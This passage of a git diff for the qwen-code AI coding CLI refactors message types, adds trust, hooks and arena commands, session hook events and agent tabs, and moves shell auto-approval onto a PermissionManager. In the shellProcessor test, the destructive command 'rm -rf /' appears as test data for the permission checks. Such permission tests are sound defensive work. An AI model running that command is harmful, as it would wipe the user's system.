ToolResult expect(mockGeminiClient.sendMessageStream).toHaveBeenNthCalledWith( 2, [{ text: 'Tool response' }], expect.any(AbortSignal), 'prompt-id-2', - { isContinuation: true }, + { type: SendMessageType.ToolResult }, ); expect(processStdoutSpy).toHaveBeenCalledWith('Final answer'); }); @@ -383,7 +384,7 @@ describe('runNonInteractive', () => { ], expect.any(AbortSignal), 'prompt-id-3', - { isContinuation: true }, + { type: SendMessageType.ToolResult }, ); expect(processStdoutSpy).toHaveBeenCalledWith('Sorry, let me try again.'); }); @@ -507,7 +508,7 @@ describe('runNonInteractive', () => { processedParts, expect.any(AbortSignal), 'prompt-id-7', - { isContinuation: false }, + { type: SendMessageType.UserQuery }, ); // 6. Assert the final output is correct @@ -539,7 +540,7 @@ describe('runNonInteractive', () => { [{ text: 'Test input' }], expect.any(AbortSignal), 'prompt-id-1', - { isContinuation: false }, + { type: SendMessageType.UserQuery }, ); // JSON adapter emits array of messages, last one is result with stats @@ -694,7 +695,7 @@ describe('runNonInteractive', () => { [{ text: 'Empty response test' }], expect.any(AbortSignal), 'prompt-id-empty', - { isContinuation: false }, + { type: SendMessageType.UserQuery }, ); // JSON adapter emits array of messages, last one is result with stats @@ -881,7 +882,7 @@ describe('runNonInteractive', () => { [{ text: 'Prompt from command' }], expect.any(AbortSignal), 'prompt-id-slash', - { isContinuation: false }, + { type: SendMessageType.UserQuery }, ); expect(processStdoutSpy).toHaveBeenCalledWith('Response from command'); @@ -941,7 +942,7 @@ describe('runNonInteractive', () => { [{ text: '/unknowncommand' }], expect.any(AbortSignal), 'prompt-id-unknown', - { isContinuation: false }, + { type: SendMessageType.UserQuery }, ); expect(processStdoutSpy).toHaveBeenCalledWith('Response to unknown'); @@ -1299,7 +1300,7 @@ describe('runNonInteractive', () => { [{ text: 'Message from stream-json input' }], expect.any(AbortSignal), 
'prompt-envelope', - { isContinuation: false }, + { type: SendMessageType.UserQuery }, ); }); @@ -1775,7 +1776,7 @@ describe('runNonInteractive', () => { [{ text: 'Simple string content' }], expect.any(AbortSignal), 'prompt-string-content', - { isContinuation: false }, + { type: SendMessageType.UserQuery }, ); // UserMessage with array of text blocks @@ -1808,7 +1809,7 @@ describe('runNonInteractive', () => { [{ text: 'First part' }, { text: 'Second part' }], expect.any(AbortSignal), 'prompt-blocks-content', - { isContinuation: false }, + { type: SendMessageType.UserQuery }, ); }); }); diff --git a/packages/cli/src/nonInteractiveCli.ts b/packages/cli/src/nonInteractiveCli.ts index 129bec380..bf29f8f0e 100644 --- a/packages/cli/src/nonInteractiveCli.ts +++ b/packages/cli/src/nonInteractiveCli.ts @@ -19,6 +19,7 @@ import { uiTelemetryService, parseAndFormatApiError, createDebugLogger, + SendMessageType, } from '@qwen-code/qwen-code-core'; import type { Content, Part, PartListUnion } from '@google/genai'; import type { CLIUserMessage, PermissionMode } from './nonInteractive/types.js'; @@ -265,7 +266,11 @@ export async function runNonInteractive( currentMessages[0]?.parts || [], abortController.signal, prompt_id, - { isContinuation: !isFirstTurn }, + { + type: isFirstTurn + ? SendMessageType.UserQuery + : SendMessageType.ToolResult, + }, ); isFirstTurn = false; @@ -385,6 +390,16 @@ export async function runNonInteractive( } } } catch (error) { + // Ensure message_start / message_stop (and content_block events) are + // properly paired even when an error aborts the turn mid-stream. + // The call is safe when no message was started (throws → caught) or + // when already finalized (idempotent guard inside the adapter). + try { + adapter.finalizeAssistantMessage(); + } catch { + // Expected when no message was started or already finalized + } + // For JSON and STREAM_JSON modes, compute usage from metrics const message = error instanceof Error ? 
error.message : String(error); const metrics = uiTelemetryService.getMetrics(); diff --git a/packages/cli/src/services/BuiltinCommandLoader.test.ts b/packages/cli/src/services/BuiltinCommandLoader.test.ts index 7d4f50421..43da3235c 100644 --- a/packages/cli/src/services/BuiltinCommandLoader.test.ts +++ b/packages/cli/src/services/BuiltinCommandLoader.test.ts @@ -37,12 +37,33 @@ vi.mock('../ui/commands/ideCommand.js', async () => { vi.mock('../ui/commands/restoreCommand.js', () => ({ restoreCommand: vi.fn(), })); +vi.mock('../ui/commands/trustCommand.js', async () => { + const { CommandKind } = await import('../ui/commands/types.js'); + return { + trustCommand: { + name: 'trust', + description: 'Trust command', + kind: CommandKind.BUILT_IN, + }, + }; +}); vi.mock('../ui/commands/permissionsCommand.js', async () => { const { CommandKind } = await import('../ui/commands/types.js'); return { permissionsCommand: { name: 'permissions', - description: 'Permissions command', + description: 'Manage permission rules', + kind: CommandKind.BUILT_IN, + }, + }; +}); + +vi.mock('../ui/commands/hooksCommand.js', async () => { + const { CommandKind } = await import('../ui/commands/types.js'); + return { + hooksCommand: { + name: 'hooks', + description: 'Hooks command', kind: CommandKind.BUILT_IN, }, }; @@ -100,6 +121,7 @@ describe('BuiltinCommandLoader', () => { mockConfig = { getFolderTrust: vi.fn().mockReturnValue(true), getUseModelRouter: () => false, + getEnableHooks: vi.fn().mockReturnValue(true), } as unknown as Config; restoreCommandMock.mockReturnValue({ @@ -162,19 +184,19 @@ describe('BuiltinCommandLoader', () => { expect(modelCmd).toBeDefined(); }); - it('should include permissions command when folder trust is enabled', async () => { + it('should include trust command when folder trust is enabled', async () => { const loader = new BuiltinCommandLoader(mockConfig); const commands = await loader.loadCommands(new AbortController().signal); - const permissionsCmd = 
commands.find((c) => c.name === 'permissions'); - expect(permissionsCmd).toBeDefined(); + const trustCmd = commands.find((c) => c.name === 'trust'); + expect(trustCmd).toBeDefined(); }); - it('should exclude permissions command when folder trust is disabled', async () => { + it('should exclude trust command when folder trust is disabled', async () => { (mockConfig.getFolderTrust as Mock).mockReturnValue(false); const loader = new BuiltinCommandLoader(mockConfig); const commands = await loader.loadCommands(new AbortController().signal); - const permissionsCmd = commands.find((c) => c.name === 'permissions'); - expect(permissionsCmd).toBeUndefined(); + const trustCmd = commands.find((c) => c.name === 'trust'); + expect(trustCmd).toBeUndefined(); }); it('should always include modelCommand', async () => { @@ -184,4 +206,19 @@ describe('BuiltinCommandLoader', () => { expect(modelCmd).toBeDefined(); expect(modelCmd?.name).toBe('model'); }); + + it('should include hooks command when enableHooks is true', async () => { + const loader = new BuiltinCommandLoader(mockConfig); + const commands = await loader.loadCommands(new AbortController().signal); + const hooksCmd = commands.find((c) => c.name === 'hooks'); + expect(hooksCmd).toBeDefined(); + }); + + it('should exclude hooks command when enableHooks is false', async () => { + (mockConfig.getEnableHooks as Mock).mockReturnValue(false); + const loader = new BuiltinCommandLoader(mockConfig); + const commands = await loader.loadCommands(new AbortController().signal); + const hooksCmd = commands.find((c) => c.name === 'hooks'); + expect(hooksCmd).toBeUndefined(); + }); }); diff --git a/packages/cli/src/services/BuiltinCommandLoader.ts b/packages/cli/src/services/BuiltinCommandLoader.ts index 4f198fb0f..f379a39de 100644 --- a/packages/cli/src/services/BuiltinCommandLoader.ts +++ b/packages/cli/src/services/BuiltinCommandLoader.ts @@ -9,12 +9,14 @@ import type { SlashCommand } from '../ui/commands/types.js'; import type { Config 
} from '@qwen-code/qwen-code-core'; import { aboutCommand } from '../ui/commands/aboutCommand.js'; import { agentsCommand } from '../ui/commands/agentsCommand.js'; +import { arenaCommand } from '../ui/commands/arenaCommand.js'; import { approvalModeCommand } from '../ui/commands/approvalModeCommand.js'; import { authCommand } from '../ui/commands/authCommand.js'; import { btwCommand } from '../ui/commands/btwCommand.js'; import { bugCommand } from '../ui/commands/bugCommand.js'; import { clearCommand } from '../ui/commands/clearCommand.js'; import { compressCommand } from '../ui/commands/compressCommand.js'; +import { contextCommand } from '../ui/commands/contextCommand.js'; import { copyCommand } from '../ui/commands/copyCommand.js'; import { docsCommand } from '../ui/commands/docsCommand.js'; import { directoryCommand } from '../ui/commands/directoryCommand.js'; @@ -30,6 +32,7 @@ import { mcpCommand } from '../ui/commands/mcpCommand.js'; import { memoryCommand } from '../ui/commands/memoryCommand.js'; import { modelCommand } from '../ui/commands/modelCommand.js'; import { permissionsCommand } from '../ui/commands/permissionsCommand.js'; +import { trustCommand } from '../ui/commands/trustCommand.js'; import { quitCommand } from '../ui/commands/quitCommand.js'; import { restoreCommand } from '../ui/commands/restoreCommand.js'; import { resumeCommand } from '../ui/commands/resumeCommand.js'; @@ -62,12 +65,14 @@ export class BuiltinCommandLoader implements ICommandLoader { const allDefinitions: Array = [ aboutCommand, agentsCommand, + arenaCommand, approvalModeCommand, authCommand, btwCommand, bugCommand, clearCommand, compressCommand, + contextCommand, copyCommand, docsCommand, directoryCommand, @@ -75,14 +80,15 @@ export class BuiltinCommandLoader implements ICommandLoader { exportCommand, extensionsCommand, helpCommand, - hooksCommand, + ...(this.config?.getEnableHooks() ? 
[hooksCommand] : []), await ideCommand(), initCommand, languageCommand, mcpCommand, memoryCommand, modelCommand, - ...(this.config?.getFolderTrust() ? [permissionsCommand] : []), + permissionsCommand, + ...(this.config?.getFolderTrust() ? [trustCommand] : []), quitCommand, restoreCommand(this.config), resumeCommand, diff --git a/packages/cli/src/services/insight/generators/DataProcessor.test.ts b/packages/cli/src/services/insight/generators/DataProcessor.test.ts index 1f90dbff5..4b78cf1bb 100644 --- a/packages/cli/src/services/insight/generators/DataProcessor.test.ts +++ b/packages/cli/src/services/insight/generators/DataProcessor.test.ts @@ -24,6 +24,7 @@ vi.mock('@qwen-code/qwen-code-core', async () => { info: vi.fn(), error: vi.fn(), warn: vi.fn(), + debug: vi.fn(), })), }; }); @@ -1137,6 +1138,102 @@ describe('DataProcessor', () => { }); }); + describe('generateQualitativeInsights', () => { + const mockMetrics = { + totalSessions: 5, + totalMessages: 50, + totalHours: 2, + heatmap: { '2025-01-15': 3 }, + topTools: [['read_file', 10]] as Array<[string, number]>, + activeDays: 1, + activeHours: { '10': 5 }, + totalLinesAdded: 100, + totalLinesRemoved: 50, + totalFiles: 10, + streak: { currentStreak: 1, longestStreak: 1, dates: [] }, + } as unknown as Omit; + + const mockFacets: SessionFacets[] = [ + { + session_id: 'test-1', + underlying_goal: 'Fix bug', + goal_categories: { debugging: 1 }, + outcome: 'fully_achieved', + user_satisfaction_counts: { satisfied: 1 }, + Qwen_helpfulness: 'very_helpful', + session_type: 'single_task', + friction_counts: {}, + friction_detail: '', + primary_success: 'correct_code_edits', + brief_summary: 'Fixed a bug', + }, + ]; + + it('should return partial qualitative data when some LLM calls fail', async () => { + let callIndex = 0; + mockGenerateJson.mockImplementation(() => { + callIndex++; + if (callIndex % 2 === 0) { + return Promise.reject(new Error('LLM timeout')); + } + return Promise.resolve({ intro: 'test', areas: [], 
opportunities: [] }); + }); + + const result = await ( + dataProcessor as unknown as { + generateQualitativeInsights( + metrics: Omit, + facets: SessionFacets[], + ): Promise< + | import('../types/QualitativeInsightTypes.js').QualitativeInsights + | undefined + >; + } + ).generateQualitativeInsights(mockMetrics, mockFacets); + + expect(result).toBeDefined(); + expect(result!.impressiveWorkflows).toBeDefined(); + expect(result!.projectAreas).toBeUndefined(); + expect(result!.futureOpportunities).toBeDefined(); + expect(result!.frictionPoints).toBeUndefined(); + }); + + it('should return undefined when facets are empty', async () => { + const result = await ( + dataProcessor as unknown as { + generateQualitativeInsights( + metrics: Omit, + facets: SessionFacets[], + ): Promise< + | import('../types/QualitativeInsightTypes.js').QualitativeInsights + | undefined + >; + } + ).generateQualitativeInsights(mockMetrics, []); + + expect(result).toBeUndefined(); + }); + + it('should return full qualitative data when all LLM calls succeed', async () => { + mockGenerateJson.mockResolvedValue({ intro: 'test', areas: [] }); + + const result = await ( + dataProcessor as unknown as { + generateQualitativeInsights( + metrics: Omit, + facets: SessionFacets[], + ): Promise< + | import('../types/QualitativeInsightTypes.js').QualitativeInsights + | undefined + >; + } + ).generateQualitativeInsights(mockMetrics, mockFacets); + + expect(result).toBeDefined(); + expect(mockGenerateJson).toHaveBeenCalledTimes(8); + }); + }); + describe('generateFacets', () => { it('should skip non-conversational sessions', async () => { const userOnlyRecords: ChatRecord[] = [ diff --git a/packages/cli/src/services/insight/generators/DataProcessor.ts b/packages/cli/src/services/insight/generators/DataProcessor.ts index a3cda424e..c77e28a49 100644 --- a/packages/cli/src/services/insight/generators/DataProcessor.ts +++ b/packages/cli/src/services/insight/generators/DataProcessor.ts @@ -388,7 +388,7 @@ export 
class DataProcessor { const generate = async ( promptTemplate: string, schema: Record, - ): Promise => { + ): Promise => { const prompt = `${promptTemplate}\n\n${commonData}`; try { const result = await this.config.getBaseLlmClient().generateJson({ @@ -400,7 +400,7 @@ export class DataProcessor { return result as T; } catch (error) { logger.error('Failed to generate insight:', error); - throw error; + return undefined; } }; diff --git a/packages/cli/src/services/insight/types/QualitativeInsightTypes.ts b/packages/cli/src/services/insight/types/QualitativeInsightTypes.ts index fc9546b98..aa9bea169 100644 --- a/packages/cli/src/services/insight/types/QualitativeInsightTypes.ts +++ b/packages/cli/src/services/insight/types/QualitativeInsightTypes.ts @@ -71,12 +71,12 @@ export interface InsightAtAGlance { } export interface QualitativeInsights { - impressiveWorkflows: InsightImpressiveWorkflows; - projectAreas: InsightProjectAreas; - futureOpportunities: InsightFutureOpportunities; - frictionPoints: InsightFrictionPoints; - memorableMoment: InsightMemorableMoment; - improvements: InsightImprovements; - interactionStyle: InsightInteractionStyle; - atAGlance: InsightAtAGlance; + impressiveWorkflows?: InsightImpressiveWorkflows; + projectAreas?: InsightProjectAreas; + futureOpportunities?: InsightFutureOpportunities; + frictionPoints?: InsightFrictionPoints; + memorableMoment?: InsightMemorableMoment; + improvements?: InsightImprovements; + interactionStyle?: InsightInteractionStyle; + atAGlance?: InsightAtAGlance; } diff --git a/packages/cli/src/services/prompt-processors/shellProcessor.test.ts b/packages/cli/src/services/prompt-processors/shellProcessor.test.ts index 151faf324..fa2afe4fd 100644 --- a/packages/cli/src/services/prompt-processors/shellProcessor.test.ts +++ b/packages/cli/src/services/prompt-processors/shellProcessor.test.ts @@ -72,7 +72,9 @@ describe('ShellProcessor', () => { getApprovalMode: vi.fn().mockReturnValue(ApprovalMode.DEFAULT), 
getShouldUseNodePtyShell: vi.fn().mockReturnValue(false), getShellExecutionConfig: vi.fn().mockReturnValue({}), - getAllowedTools: vi.fn().mockReturnValue([]), + getPermissionsAllow: vi.fn().mockReturnValue([]), + // Default: no permission manager (tests that need one set it explicitly) + getPermissionManager: vi.fn().mockReturnValue(null), }; context = createMockCommandContext({ @@ -206,9 +208,11 @@ describe('ShellProcessor', () => { allAllowed: false, disallowedCommands: ['rm -rf /'], }); - (mockConfig.getAllowedTools as Mock).mockReturnValue([ - 'ShellTool(rm -rf /)', - ]); + // Simulate allowedTools being pre-merged into permissionsAllow by Config, + // so PermissionManager returns 'allow' for this command. + (mockConfig.getPermissionManager as Mock).mockReturnValue({ + isCommandAllowed: (_cmd: string) => 'allow', + }); mockShellExecute.mockReturnValue({ result: Promise.resolve({ ...SUCCESS_RESULT, output: 'deleted' }), }); diff --git a/packages/cli/src/services/prompt-processors/shellProcessor.ts b/packages/cli/src/services/prompt-processors/shellProcessor.ts index 2a6df7161..187b98460 100644 --- a/packages/cli/src/services/prompt-processors/shellProcessor.ts +++ b/packages/cli/src/services/prompt-processors/shellProcessor.ts @@ -7,13 +7,11 @@ import { ApprovalMode, checkCommandPermissions, - doesToolInvocationMatch, escapeShellArg, getShellConfiguration, ShellExecutionService, flatMapTextParts, } from '@qwen-code/qwen-code-core'; -import type { AnyToolInvocation } from '@qwen-code/qwen-code-core'; import type { CommandContext } from '../../ui/commands/types.js'; import type { IPromptProcessor, PromptPipelineContent } from './types.js'; @@ -109,10 +107,9 @@ export class ShellProcessor implements IPromptProcessor { return { ...injection, resolvedCommand: undefined }; } - const resolvedCommand = command.replaceAll( - SHORTHAND_ARGS_PLACEHOLDER, - userArgsEscaped, - ); + const resolvedCommand = command + .replaceAll(SHORTHAND_ARGS_PLACEHOLDER, userArgsEscaped) // 
Replace {{args}} + .replaceAll('$ARGUMENTS', userArgsEscaped); // Replace $ARGUMENTS return { ...injection, resolvedCommand }; }, ); @@ -126,15 +123,12 @@ export class ShellProcessor implements IPromptProcessor { // Security check on the final, escaped command string. const { allAllowed, disallowedCommands, blockReason, isHardDenial } = checkCommandPermissions(command, config, sessionShellAllowlist); - const allowedTools = config.getAllowedTools() || []; - const invocation = { - params: { command }, - } as AnyToolInvocation; - const isAllowedBySettings = doesToolInvocationMatch( - 'run_shell_command', - invocation, - allowedTools, - ); + + // Determine if this command is explicitly auto-approved via PermissionManager + const pm = config.getPermissionManager?.(); + const isAllowedBySettings = pm + ? pm.isCommandAllowed(command) === 'allow' + : false; if (!allAllowed) { if (isHardDenial) { diff --git a/packages/cli/src/ui/App.test.tsx b/packages/cli/src/ui/App.test.tsx index be09fe52f..8df422f4b 100644 --- a/packages/cli/src/ui/App.test.tsx +++ b/packages/cli/src/ui/App.test.tsx @@ -9,6 +9,11 @@ import { render } from 'ink-testing-library'; import { Text, useIsScreenReaderEnabled } from 'ink'; import { App } from './App.js'; import { UIStateContext, type UIState } from './contexts/UIStateContext.js'; +import { + UIActionsContext, + type UIActions, +} from './contexts/UIActionsContext.js'; +import { AgentViewProvider } from './contexts/AgentViewContext.js'; import { StreamingState } from './types.js'; vi.mock('ink', async (importOriginal) => { @@ -43,6 +48,10 @@ vi.mock('./components/Footer.js', () => ({ Footer: () => Footer, })); +vi.mock('./components/agent-view/AgentTabBar.js', () => ({ + AgentTabBar: () => null, +})); + describe('App', () => { const mockUIState: Partial = { streamingState: StreamingState.Idle, @@ -58,13 +67,24 @@ describe('App', () => { }, }; - it('should render main content and composer when not quitting', () => { - const { lastFrame } = render( 
- - - , + const mockUIActions = { + refreshStatic: vi.fn(), + } as unknown as UIActions; + + const renderWithProviders = (uiState: UIState) => + render( + + + + + + + , ); + it('should render main content and composer when not quitting', () => { + const { lastFrame } = renderWithProviders(mockUIState as UIState); + expect(lastFrame()).toContain('MainContent'); expect(lastFrame()).toContain('Composer'); }); @@ -75,11 +95,7 @@ describe('App', () => { quittingMessages: [{ id: 1, type: 'user', text: 'test' }], } as UIState; - const { lastFrame } = render( - - - , - ); + const { lastFrame } = renderWithProviders(quittingUIState); expect(lastFrame()).toContain('Quitting...'); }); @@ -90,11 +106,7 @@ describe('App', () => { dialogsVisible: true, } as UIState; - const { lastFrame } = render( - - - , - ); + const { lastFrame } = renderWithProviders(dialogUIState); expect(lastFrame()).toContain('MainContent'); expect(lastFrame()).toContain('DialogManager'); @@ -107,11 +119,7 @@ describe('App', () => { ctrlCPressedOnce: true, } as UIState; - const { lastFrame } = render( - - - , - ); + const { lastFrame } = renderWithProviders(ctrlCUIState); expect(lastFrame()).toContain('Press Ctrl+C again to exit.'); }); @@ -123,11 +131,7 @@ describe('App', () => { ctrlDPressedOnce: true, } as UIState; - const { lastFrame } = render( - - - , - ); + const { lastFrame } = renderWithProviders(ctrlDUIState); expect(lastFrame()).toContain('Press Ctrl+D again to exit.'); }); @@ -135,11 +139,7 @@ describe('App', () => { it('should render ScreenReaderAppLayout when screen reader is enabled', () => { (useIsScreenReaderEnabled as vi.Mock).mockReturnValue(true); - const { lastFrame } = render( - - - , - ); + const { lastFrame } = renderWithProviders(mockUIState as UIState); expect(lastFrame()).toContain( 'Notifications\nFooter\nMainContent\nComposer', @@ -149,11 +149,7 @@ describe('App', () => { it('should render DefaultAppLayout when screen reader is not enabled', () => { (useIsScreenReaderEnabled as 
vi.Mock).mockReturnValue(false); - const { lastFrame } = render( - - - , - ); + const { lastFrame } = renderWithProviders(mockUIState as UIState); expect(lastFrame()).toContain('MainContent\nComposer'); }); diff --git a/packages/cli/src/ui/AppContainer.test.tsx b/packages/cli/src/ui/AppContainer.test.tsx index 5601fc836..0057103f5 100644 --- a/packages/cli/src/ui/AppContainer.test.tsx +++ b/packages/cli/src/ui/AppContainer.test.tsx @@ -78,6 +78,21 @@ vi.mock('./hooks/useAutoAcceptIndicator.js'); vi.mock('./hooks/useGitBranchName.js'); vi.mock('./contexts/VimModeContext.js'); vi.mock('./contexts/SessionContext.js'); +vi.mock('./contexts/AgentViewContext.js', () => ({ + useAgentViewState: vi.fn(() => ({ + activeView: 'main', + agents: new Map(), + })), + useAgentViewActions: vi.fn(() => ({ + switchToMain: vi.fn(), + switchToAgent: vi.fn(), + switchToNext: vi.fn(), + switchToPrevious: vi.fn(), + registerAgent: vi.fn(), + unregisterAgent: vi.fn(), + unregisterAll: vi.fn(), + })), +})); vi.mock('./components/shared/text-buffer.js'); vi.mock('./hooks/useLogger.js'); @@ -268,7 +283,7 @@ describe('AppContainer State Management', () => { listSubagents: vi.fn().mockResolvedValue([]), addChangeListener: vi.fn(), loadSubagent: vi.fn(), - createSubagentScope: vi.fn(), + createSubagent: vi.fn(), }; vi.spyOn(mockConfig, 'getSubagentManager').mockReturnValue( mockSubagentManager as SubagentManager, diff --git a/packages/cli/src/ui/AppContainer.tsx b/packages/cli/src/ui/AppContainer.tsx index e5f83ed4b..75b937ffd 100644 --- a/packages/cli/src/ui/AppContainer.tsx +++ b/packages/cli/src/ui/AppContainer.tsx @@ -39,6 +39,8 @@ import { getAllGeminiMdFilenames, ShellExecutionService, Storage, + SessionEndReason, + SessionStartSource, } from '@qwen-code/qwen-code-core'; import { buildResumedHistoryItems } from './utils/resumeHistoryUtils.js'; import { validateAuthMethod } from '../config/auth.js'; @@ -52,6 +54,7 @@ import { useAuthCommand } from './auth/useAuth.js'; import { 
useEditorSettings } from './hooks/useEditorSettings.js'; import { useSettingsCommand } from './hooks/useSettingsCommand.js'; import { useModelCommand } from './hooks/useModelCommand.js'; +import { useArenaCommand } from './hooks/useArenaCommand.js'; import { useApprovalModeCommand } from './hooks/useApprovalModeCommand.js'; import { useResumeCommand } from './hooks/useResumeCommand.js'; import { useSlashCommandProcessor } from './hooks/slashCommandProcessor.js'; @@ -97,6 +100,7 @@ import { } from './hooks/useExtensionUpdates.js'; import { useCodingPlanUpdates } from './hooks/useCodingPlanUpdates.js'; import { ShellFocusContext } from './contexts/ShellFocusContext.js'; +import { useAgentViewState } from './contexts/AgentViewContext.js'; import { t } from '../i18n/index.js'; import { useWelcomeBack } from './hooks/useWelcomeBack.js'; import { useDialogClose } from './hooks/useDialogClose.js'; @@ -237,6 +241,10 @@ export const AppContainer = (props: AppContainerProps) => { const { codingPlanUpdateRequest, dismissCodingPlanUpdate } = useCodingPlanUpdates(settings, config, historyManager.addItem); + const [isTrustDialogOpen, setTrustDialogOpen] = useState(false); + const openTrustDialog = useCallback(() => setTrustDialogOpen(true), []); + const closeTrustDialog = useCallback(() => setTrustDialogOpen(false), []); + const [isPermissionsDialogOpen, setPermissionsDialogOpen] = useState(false); const openPermissionsDialog = useCallback( () => setPermissionsDialogOpen(true), @@ -290,7 +298,42 @@ export const AppContainer = (props: AppContainerProps) => { ); historyManager.loadHistory(historyItems); } + + // Fire SessionStart event after config is initialized + const sessionStartSource = resumedSessionData + ? SessionStartSource.Resume + : SessionStartSource.Startup; + + const hookSystem = config.getHookSystem(); + + if (hookSystem) { + hookSystem + .fireSessionStartEvent(sessionStartSource, config.getModel() ?? 
'') + .then(() => { + debugLogger.debug('SessionStart event completed successfully'); + }) + .catch((err) => { + debugLogger.warn(`SessionStart hook failed: ${err}`); + }); + } else { + debugLogger.debug( + 'SessionStart: HookSystem not available, skipping event', + ); + } })(); + + // Register SessionEnd cleanup for process exit + registerCleanup(async () => { + try { + await config + .getHookSystem() + ?.fireSessionEndEvent(SessionEndReason.PromptInputExit); + debugLogger.debug('SessionEnd event completed successfully!!!'); + } catch (err) { + debugLogger.error(`SessionEnd hook failed: ${err}`); + } + }); + registerCleanup(async () => { const ideClient = await IdeClient.getInstance(); await ideClient.disconnect(); @@ -471,6 +514,8 @@ export const AppContainer = (props: AppContainerProps) => { const { isModelDialogOpen, openModelDialog, closeModelDialog } = useModelCommand(); + const { activeArenaDialog, openArenaDialog, closeArenaDialog } = + useArenaCommand(); const { isResumeDialogOpen, @@ -510,6 +555,8 @@ export const AppContainer = (props: AppContainerProps) => { openEditorDialog, openSettingsDialog, openModelDialog, + openTrustDialog, + openArenaDialog, openPermissionsDialog, openApprovalModeDialog, quit: (messages: HistoryItem[]) => { @@ -534,8 +581,10 @@ export const AppContainer = (props: AppContainerProps) => { openEditorDialog, openSettingsDialog, openModelDialog, + openArenaDialog, setDebugMessage, dispatchExtensionStateUpdate, + openTrustDialog, openPermissionsDialog, openApprovalModeDialog, addConfirmUpdateExtensionRequest, @@ -673,12 +722,15 @@ export const AppContainer = (props: AppContainerProps) => { // Track whether suggestions are visible for Tab key handling const [hasSuggestionsVisible, setHasSuggestionsVisible] = useState(false); - // Auto-accept indicator + const agentViewState = useAgentViewState(); + + // Auto-accept indicator — disabled on agent tabs (agents handle their own) const showAutoAcceptIndicator = useAutoAcceptIndicator({ 
config, addItem: historyManager.addItem, onApprovalModeChange: handleApprovalModeChange, shouldBlockTab: () => hasSuggestionsVisible, + disabled: agentViewState.activeView !== 'main', }); const { messageQueue, addMessage, clearQueue, getQueuedMessagesText } = @@ -691,6 +743,14 @@ export const AppContainer = (props: AppContainerProps) => { // Callback for handling final submit (must be after addMessage from useMessageQueue) const handleFinalSubmit = useCallback( (submittedValue: string) => { + // Route to active in-process agent if viewing a sub-agent tab. + if (agentViewState.activeView !== 'main') { + const agent = agentViewState.agents.get(agentViewState.activeView); + if (agent) { + agent.interactiveAgent.enqueueMessage(submittedValue.trim()); + return; + } + } if ( streamingState === StreamingState.Responding && isBtwCommand(submittedValue) @@ -700,7 +760,16 @@ export const AppContainer = (props: AppContainerProps) => { } addMessage(submittedValue); }, - [addMessage, streamingState, submitQuery], + [addMessage, agentViewState, streamingState, submitQuery], + ); + + const handleArenaModelsSelected = useCallback( + (models: string[]) => { + const value = models.join(','); + buffer.setText(`/arena start --models ${value} `); + closeArenaDialog(); + }, + [buffer, closeArenaDialog], ); // Welcome back functionality (must be after handleFinalSubmit) @@ -776,10 +845,17 @@ export const AppContainer = (props: AppContainerProps) => { } }, [buffer, terminalWidth, terminalHeight]); - // Compute available terminal height based on controls measurement + // agentViewState is declared earlier (before handleFinalSubmit) so it + // is available for input routing. Referenced here for layout computation. + + // Compute available terminal height based on controls measurement. + // When in-process agents are present the AgentTabBar renders an extra + // row at the top of the layout; subtract it so downstream consumers + // (shell, transcript, etc.) 
don't overestimate available space. + const tabBarHeight = agentViewState.agents.size > 0 ? 1 : 0; const availableTerminalHeight = Math.max( 0, - terminalHeight - controlsHeight - staticExtraHeight - 2, + terminalHeight - controlsHeight - staticExtraHeight - 2 - tabBarHeight, ); config.setShellExecutionConfig({ @@ -1033,16 +1109,23 @@ export const AppContainer = (props: AppContainerProps) => { [historyManager, setShowCommandMigrationNudge, config.storage], ); - const { elapsedTime, currentLoadingPhrase } = useLoadingIndicator( - streamingState, - settings.merged.ui?.customWittyPhrases, - ); + const currentCandidatesTokens = Object.values( + sessionStats.metrics?.models ?? {}, + ).reduce((acc, model) => acc + (model.tokens?.candidates ?? 0), 0); + + const { elapsedTime, currentLoadingPhrase, taskStartTokens } = + useLoadingIndicator( + streamingState, + settings.merged.ui?.customWittyPhrases, + currentCandidatesTokens, + ); useAttentionNotifications({ isFocused, streamingState, elapsedTime, settings, + config, }); // Dialog close functionality @@ -1058,6 +1141,8 @@ export const AppContainer = (props: AppContainerProps) => { exitEditorDialog, isSettingsDialogOpen, closeSettingsDialog, + activeArenaDialog, + closeArenaDialog, isFolderTrustDialogOpen, showWelcomeBackDialog, handleWelcomeBackClose, @@ -1332,6 +1417,8 @@ export const AppContainer = (props: AppContainerProps) => { isThemeDialogOpen || isSettingsDialogOpen || isModelDialogOpen || + isTrustDialogOpen || + activeArenaDialog !== null || isPermissionsDialogOpen || isAuthDialogOpen || isAuthenticating || @@ -1382,6 +1469,8 @@ export const AppContainer = (props: AppContainerProps) => { quittingMessages, isSettingsDialogOpen, isModelDialogOpen, + isTrustDialogOpen, + activeArenaDialog, isPermissionsDialogOpen, isApprovalModeDialogOpen, isResumeDialogOpen, @@ -1461,6 +1550,8 @@ export const AppContainer = (props: AppContainerProps) => { isMcpDialogOpen, // Feedback dialog isFeedbackDialogOpen, + // Per-task token 
tracking + taskStartTokens, }), [ isThemeDialogOpen, @@ -1478,6 +1569,8 @@ export const AppContainer = (props: AppContainerProps) => { quittingMessages, isSettingsDialogOpen, isModelDialogOpen, + isTrustDialogOpen, + activeArenaDialog, isPermissionsDialogOpen, isApprovalModeDialogOpen, isResumeDialogOpen, @@ -1558,6 +1651,8 @@ export const AppContainer = (props: AppContainerProps) => { isMcpDialogOpen, // Feedback dialog isFeedbackDialogOpen, + // Per-task token tracking + taskStartTokens, ], ); @@ -1577,7 +1672,11 @@ export const AppContainer = (props: AppContainerProps) => { exitEditorDialog, closeSettingsDialog, closeModelDialog, + openArenaDialog, + closeArenaDialog, + handleArenaModelsSelected, dismissCodingPlanUpdate, + closeTrustDialog, closePermissionsDialog, setShellModeActive, vimHandleInput, @@ -1626,7 +1725,11 @@ export const AppContainer = (props: AppContainerProps) => { exitEditorDialog, closeSettingsDialog, closeModelDialog, + openArenaDialog, + closeArenaDialog, + handleArenaModelsSelected, dismissCodingPlanUpdate, + closeTrustDialog, closePermissionsDialog, setShellModeActive, vimHandleInput, diff --git a/packages/cli/src/ui/commands/arenaCommand.test.ts b/packages/cli/src/ui/commands/arenaCommand.test.ts new file mode 100644 index 000000000..99f902259 --- /dev/null +++ b/packages/cli/src/ui/commands/arenaCommand.test.ts @@ -0,0 +1,395 @@ +/** + * @license + * Copyright 2025 Qwen Team + * SPDX-License-Identifier: Apache-2.0 + */ + +import { describe, it, expect, vi, beforeEach } from 'vitest'; +import { + type ArenaManager, + AgentStatus, + ArenaSessionStatus, +} from '@qwen-code/qwen-code-core'; +import { arenaCommand } from './arenaCommand.js'; +import type { + CommandContext, + OpenDialogActionReturn, + SlashCommand, +} from 